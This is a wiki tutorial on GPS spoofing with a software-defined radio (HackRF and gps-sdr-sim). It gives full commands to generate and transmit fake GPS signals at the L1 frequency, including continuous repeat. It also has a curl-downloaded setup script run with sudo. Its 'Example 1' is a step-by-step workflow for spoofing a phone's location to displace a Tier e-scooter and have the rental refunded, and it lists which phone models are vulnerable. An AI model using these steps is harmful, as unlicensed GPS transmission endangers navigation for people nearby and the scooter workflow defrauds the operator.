Tutorials/GPS Spoofing/Hardware

From Teilen macht Spass!


Using Software Defined Radio (SDR) to simulate GPS signals.

NOTE: THIS IS POSSIBLY NOT ALLOWED IN YOUR COUNTRY FOR GOOD REASONS

Prerequisites

Hardware

  • computer with Linux (Debian) or OSX(?)
  • SDR transceiver capable of transmitting above 1500 MHz (USRP, HackRF, BladeRF, LimeSDR, LimeSDR Mini, PlutoSDR)

Software

  • gps-sdr-sim


Installation (Debian)

Generating GPS Signal using HackRF and Debian

Adding HackRF Support

$ sudo apt update
$ sudo apt install gnuradio libhackrf0 hackrf libhackrf-dev

Hook up your HackRF and check that it is recognized:

$ hackrf_info

You should see something like:

Found HackRF board.
Board ID Number: 2 (HackRF One)
Firmware Version: 2015.07.2
Part ID Number: 0xa000cw898 0x09898908 (redacted)
Serial Number: 000000000 0000 00 00000000 (redacted)

gps-sdr-sim (download + compile)

$ git clone https://github.com/osqzss/gps-sdr-sim.git
$ cd gps-sdr-sim
$ make


Building gps-sdr-sim only takes a few seconds.


Generate simulated motion file

Download the latest brdc (broadcast ephemeris) file from here: [1](ftp://cddis.gsfc.nasa.gov/gnss/data/daily) (for example: ftp://cddis.gsfc.nasa.gov/gnss/data/daily/2020/brdc/brdc1460.20g.Z)

Extract the compressed file in a place you will remember.

Generate the binary file to be transmitted by the HackRF:


$ ./gps-sdr-sim -b 8 -e ~/LOCATION_OF_YOUR_BRDC/brdc1460.20n -l 45.803304,12.133697,100  


By default this generates a 300 s (5 min) 'motion' file; the duration can be increased with the '-d' option. The last argument is the location of your choosing (lat, long, altitude). The run takes about 300 seconds and produces a 'gpssim.bin' file. **NOTE** the lat/long/alt argument must not contain any spaces, only commas.


Spoof location

To transmit your spoofed GPS position using the HackRF, use the following command:


$ hackrf_transfer -t ~/LOCATION_OF_YOUR_BIN_FILE/gpssim.bin -f 1575420000 -s 2600000 -a 1 -x 0 


The motion file only simulates for a given period (-d); luckily hackrf_transfer can repeat the transmission with the '-R' switch:

$ hackrf_transfer -t ~/LOCATION_OF_YOUR_BIN_FILE/gpssim.bin -f 1575420000 -s 2600000 -a 1 -x 0 -R

(see: https://www.blackhat.com/docs/eu-15/materials/eu-15-Kang-Is-Your-Timespace-Safe-Time-And-Position-Spoofing-Opensourcely-wp.pdf)

Installing on Arch

You could build gps-sdr-sim from scratch (very quick, recommended), but I chose to use the binary provided by the 'blackarch' distro's repository.

Prerequisites

$ curl -O https://blackarch.org/strap.sh
$ chmod +x strap.sh
$ sudo ./strap.sh        # installing the keyring step takes a few minutes
$ sudo pacman -Syyu      # update pacman sources etc., although strap.sh already seems to take care of this
$ sudo pacman -S blackarch-radio   # just install all the radio stuff (1 GB)
$ sudo modprobe hackrf   # load the hackrf kernel module/driver
$ hackrf_info            # check that your HackRF One is detected



Example 1: Displacing a Tier E-Scooter

Disclaimer: tested in a Faraday cage, not in public

Workflow:

  1. Generate a motion file for a position WITHIN the service area of TIER
  2. Transmit it using the HackRF
  3. Wait until your phone is displaced according to the simulated motion
  4. Open the TIER app and rent a scooter in your vicinity
  5. The moment you rent it, the scooter will be displaced
  6. Immediately end the rental; the scooter will remain displaced and your money is refunded

Observations

  • You can only spoof location within the service area and current city.
  • Although there is a GPS antenna in the scooter, only the user's phone GPS is used.
  • The location is only updated by people renting it. Nope, it's constantly updating.

Caveats

Newer devices such as the iPhone 10 can not be spoofed (yet). It seems they not only use GPS (US) but also other positioning systems on different frequencies: Galileo (EU), GLONASS (RU) (and BeiDou (CN)?). Vulnerable devices tested (no need to switch off wifi, GSM etc., works out of the box):

  • iPhone 6, running iOS 12.4.4
  • Samsung S10e, running Android 10

Not vulnerable (also not with wifi disabled):

  • iPhone SE (2nd gen)
  • iPhone X

Improvements / Troubleshooting